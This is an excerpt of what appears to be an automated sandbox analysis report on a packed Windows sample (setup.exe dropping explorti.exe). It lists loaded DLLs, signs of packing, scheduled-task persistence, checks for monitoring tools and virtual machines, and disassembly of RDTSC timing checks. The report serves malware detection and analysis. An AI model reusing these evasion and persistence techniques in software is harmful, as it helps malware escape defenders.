                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: setup.exeStatic file information: File size 1971200 > 1048576
                    Source: setup.exeStatic PE information: Raw size of rylhmesc is bigger than: 0x100000 < 0x1afc00

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 0.2.setup.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 2.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 3.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 10.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: explorti.exe.0.drStatic PE information: real checksum: 0x1edd2b should be: 0x1ed18b
                    Source: setup.exeStatic PE information: real checksum: 0x1edd2b should be: 0x1ed18b
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: .idata
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: rylhmesc
                    Source: setup.exeStatic PE information: section name: ofvhckac
                    Source: setup.exeStatic PE information: section name: .taggant
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: rylhmesc
                    Source: explorti.exe.0.drStatic PE information: section name: ofvhckac
                    Source: explorti.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 10_2_002CD84C push ecx; ret 10_2_002CD85F
                    Source: setup.exeStatic PE information: section name: entropy: 7.983148121720557
                    Source: setup.exeStatic PE information: section name: rylhmesc entropy: 7.952696111098041
                    Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.983148121720557
                    Source: explorti.exe.0.drStatic PE information: section name: rylhmesc entropy: 7.952696111098041
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: C8EFBC second address: C8E7EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d cld 0x0000000e mov dword ptr [ebp+122D1CC1h], edi 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0B15h] 0x0000001b mov dword ptr [ebp+122D1C24h], ebx 0x00000021 call dword ptr [ebp+122D26DAh] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1B97h], ecx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1B97h], eax 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FF32CDD6578h 0x0000003f mov dword ptr [ebp+122D34ECh], eax 0x00000045 mov dword ptr [ebp+122D1B97h], eax 0x0000004b mov esi, 0000003Ch 0x00000050 jp 00007FF32CDD6567h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FF32CDD6579h 0x0000005f lodsw 0x00000061 clc 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 clc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1B97h], ecx 0x00000072 sub eax, dword ptr [ebp+122D3414h] 0x00000078 popad 0x00000079 nop 0x0000007a pushad 0x0000007b jbe 00007FF32CDD656Ch 0x00000081 jp 00007FF32CDD6566h 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: C8E7EC second address: C8E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF32CFB71F6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: DE9D49 second address: DE9D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF32CDD6575h 0x0000000a jl 00007FF32CDD6566h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E05EAE second address: E05EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E05EB2 second address: E05F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6576h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF32CDD6578h 0x00000011 jmp 00007FF32CDD6579h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E05F02 second address: E05F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E05F07 second address: E05F0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E06060 second address: E0609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB71FFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007FF32CFB71F6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007FF32CFB71F6h 0x0000001f popad 0x00000020 jmp 00007FF32CFB7205h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E061D3 second address: E061E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jne 00007FF32CDD6566h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E08DBA second address: E08E34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF32CFB7201h 0x0000000f popad 0x00000010 add dword ptr [esp], 0C9E1D41h 0x00000017 jc 00007FF32CFB71F9h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF32CFB71F8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c push 00000000h 0x0000003e mov esi, edx 0x00000040 mov cx, E9AAh 0x00000044 push 00000003h 0x00000046 mov edi, dword ptr [ebp+122D26E0h] 0x0000004c push 6C589B65h 0x00000051 pushad 0x00000052 jnc 00007FF32CFB71FCh 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E08E34 second address: E08E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E08E38 second address: E08E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7202h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 53A7649Bh 0x00000011 jmp 00007FF32CFB7202h 0x00000016 lea ebx, dword ptr [ebp+1244DC23h] 0x0000001c mov dword ptr [ebp+122D26E7h], edx 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E08E7A second address: E08E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E08E7E second address: E08E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E08EE9 second address: E08F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D19B0h], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 xor dword ptr [ebp+122D2EE4h], esi 0x00000018 pop edx 0x00000019 push 47E2DAD0h 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007FF32CDD656Ch 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E08F15 second address: E08F8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 47E2DA50h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF32CFB71F8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007FF32CFB7208h 0x0000002e push 00000003h 0x00000030 stc 0x00000031 push 00000000h 0x00000033 call 00007FF32CFB71FAh 0x00000038 and esi, dword ptr [ebp+122D362Ch] 0x0000003e pop edx 0x0000003f push 00000003h 0x00000041 and edx, dword ptr [ebp+122D1B16h] 0x00000047 push A898F41Fh 0x0000004c push ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF32CFB71FAh 0x00000054 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E0904C second address: E090D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D1960h], edx 0x00000013 push 00000000h 0x00000015 mov di, cx 0x00000018 push 4FE6D845h 0x0000001d jmp 00007FF32CDD656Bh 0x00000022 xor dword ptr [esp], 4FE6D8C5h 0x00000029 mov dl, 99h 0x0000002b push 00000003h 0x0000002d push ecx 0x0000002e mov dword ptr [ebp+122D1C03h], eax 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 sbb cx, BB00h 0x0000003c push 00000003h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FF32CDD6568h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov si, 882Dh 0x0000005c push D27FA0DCh 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E090D2 second address: E090D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2A523 second address: E2A527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2A69F second address: E2A6A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2A7EB second address: E2A800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF32CDD6566h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FF32CDD6566h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2A800 second address: E2A804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2A804 second address: E2A811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2A811 second address: E2A819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2A819 second address: E2A835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CDD6575h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2A835 second address: E2A842 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2AAEC second address: E2AAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2ADFF second address: E2AE03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2AF88 second address: E2AF92 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B108 second address: E2B119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FF32CFB71F6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B253 second address: E2B259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B259 second address: E2B262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B262 second address: E2B268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B268 second address: E2B270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B270 second address: E2B27C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B27C second address: E2B280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B280 second address: E2B292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B3EE second address: E2B3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B3F9 second address: E2B41F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 jmp 00007FF32CDD656Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 js 00007FF32CDD6572h 0x00000016 jl 00007FF32CDD656Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B5AC second address: E2B5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2B5B2 second address: E2B5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E1FA6C second address: E1FA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2BC67 second address: E2BC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2BC6B second address: E2BC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF32CFB71FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2BC85 second address: E2BC98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c ja 00007FF32CDD6566h 0x00000012 pop ebx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2BC98 second address: E2BCA7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CFB71F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2BF90 second address: E2BF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2BF94 second address: E2BFAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7205h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E2C0F0 second address: E2C0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
